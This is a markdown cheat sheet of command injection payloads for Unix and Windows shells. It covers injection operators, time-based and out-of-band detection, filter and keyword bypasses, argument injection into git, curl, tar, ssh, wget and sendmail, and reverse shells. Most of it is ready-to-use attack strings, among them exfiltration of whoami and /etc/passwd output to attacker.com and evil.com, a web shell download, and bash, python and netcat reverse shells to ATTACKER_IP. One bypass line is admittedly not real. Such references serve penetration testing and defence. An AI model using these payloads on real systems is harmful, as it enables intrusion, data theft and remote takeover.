Command-Injection.md

Command Injection

Basic Operators

; ls                    # command separator
| ls                    # pipe
|| ls                   # OR (runs if first fails)
&& ls                   # AND (runs if first succeeds)
& ls                    # background (runs both)
`ls`                    # backtick substitution
$(ls)                   # command substitution
>(ls)                   # process substitution
\nls                    # newline
%0als                   # URL-encoded newline

Blind Detection

# Time-based
; sleep 10
| sleep 10
& sleep 10
|| sleep 10
&& sleep 10
$(sleep 10)
`sleep 10`
; ping -c 10 127.0.0.1

# OOB / DNS exfil
; curl attacker.com/$(whoami)
; nslookup $(whoami).attacker.oastify.com
|| curl attacker.com/$(cat /etc/passwd | base64 | head -1)
; wget http://attacker.com/$(id | base64)
& host $(whoami).attacker.com

# File write detection
; echo "proof" > /var/www/html/proof.txt

Filter Bypass

# Space bypass
{ls,-la}                 # brace expansion
ls$IFS-la               # $IFS = internal field separator (space/tab/newline)
ls${IFS}-la
ls%09-la                # tab character
cat<>/etc/passwd         # redirection instead of space
X=$'cat\x20/etc/passwd'&&$X

# Slash bypass
${PATH%%u*}             # extracts / from /usr
$(echo L2V0Yy9wYXNzd2Q= | base64 -d)   # base64 decode /etc/passwd

# Keyword bypass (if "cat" or "ls" is blocked)
c'a't /etc/passwd       # quotes in command name
c""at /etc/passwd       # empty quotes
c\at /etc/passwd        # backslash
/???/c?t /etc/passwd    # wildcards
/???/??t /???/p??s??    # full wildcard
cat$u /etc/passwd       # undefined variable ($u is empty)
$(printf '\x63\x61\x74') /etc/passwd  # hex printf
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash  # base64
{cat,/etc/passwd}       # brace expansion

# Bypass using environment variables
echo ${PATH:0:1}        # /
echo ${LS_COLORS:10:1}  # ;

# Bypass using $() and variable substitution
a]b]c]d=cat;${a]b]c]d} /etc/passwd   # not real, but concept

# Newline bypass in URL
%0a ls
%0d%0a ls

# Semicolon bypass
%0a instead of ;
$'\x0a' (bash newline)

Windows-Specific

& dir
| dir
&& dir
|| dir
; not a separator in CMD, use & instead

# Bypass
"w"h"o"a"m"i
who^ami                 # caret escape
set a=who&set b=ami&call %a%%b%
cmd /c "whoami"
powershell -c "whoami"

Common Injection Points

# User-agent sent to logging commands
# Filenames passed to processing tools (ffmpeg, imagemagick, exiftool)
# Email addresses in mail commands
# IP addresses in ping/traceroute features
# DNS lookup inputs
# PDF generators using command-line tools
# Git operations (repo URL, branch name)
# Archive extraction (filename injection in tar, zip)

Argument Injection

# Not command injection - instead, injecting arguments to existing commands
# Works when user input is passed as argument to a fixed command

# Git clone
git clone USER_INPUT
# Inject: --upload-pack='touch /tmp/pwned' https://github.com/x/x
# Or: -c protocol.ext.allow=always ext::sh -c 'id>/tmp/pwned' %s% .

# curl
curl USER_INPUT
# Inject: -o /var/www/html/shell.php https://evil.com/shell.txt
# Or: --config /etc/passwd (read files via error)

# tar
tar czf backup.tar.gz USER_INPUT
# Inject: --checkpoint=1 --checkpoint-action=exec='id'

# find
find /dir -name USER_INPUT
# Inject: -exec id \;

# rsync
rsync USER_INPUT target:
# Inject: -e 'sh -c id' .

# ssh
ssh USER_INPUT
# Inject: -o ProxyCommand='curl evil.com/$(whoami)'

# wget
wget USER_INPUT
# Inject: --post-file=/etc/passwd https://evil.com/exfil

# sendmail
sendmail USER_INPUT
# Inject: -OQueueDirectory=/tmp -X/var/www/html/log.php

# ghostscript (pdf processing)
# -dSAFER bypass, file read/write via postscript

Escalation: Reverse Shell

; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f